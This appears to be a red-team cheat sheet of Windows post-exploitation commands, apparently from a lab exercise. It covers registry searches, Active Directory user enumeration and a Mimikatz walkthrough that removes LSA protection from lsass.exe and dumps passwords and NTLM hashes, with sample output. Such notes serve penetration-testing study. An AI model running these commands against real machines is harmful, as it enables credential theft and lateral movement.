Post Exploitation

Red teaming Windows machines after gaining Administrator

Windows

Searching for keywords in Windows Registry:

reg query HKLM /f $KEYWORD /t REG_SZ /s

Run command prompt as another user if you know their password:

runas /user:$USER "cmd.exe"

Active Directory

Enumerating users:

# All info
Get-ADUser -Filter * -Properties *
# Specific details
Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description

Dumping Credentials

LSASS

Local Security Authority Service (LSASS) is a Windows process that handles the operating system security policy and enforce it on a system. It verifies logged in accounts and ensure passwords, hashes, and Kerberos tickets. Windows stores credentials in the LSASS process to enable users to access network resources, such as file shares, SharePoint sites, and other network services. It can also be used to dump credentials to either escalate privileges, steal data, or move laterally. With administrator privilege, the process memory of LSASS can be dumped and used to create a dump file, a snapshot of a given process.

This can be manually done or can be quickly done with Mimikatz. In some cases, there will be protected LSASS. This will require an additional driver called mimidrv.sys that works on a kernel level to disable the LSA protection

# Start mimikatz
.\mimikatz.exe

# Disable LSASS protection
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

# Enable SeDebugPrivilege permission and check for memory access
mimikatz # privilege::debug
Privilege '20' OK

# Dump LSA
mimikatz # lsadump::lsa /patch
Domain : THM / S-1-5-21-1966530601-3185510712-10604624
RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : fc9b72f354f0371219168bdb1460af32
...

# Dump cached passwords and hashes from lsass.exe
mimikatz # sekurlsa::logonpasswords
...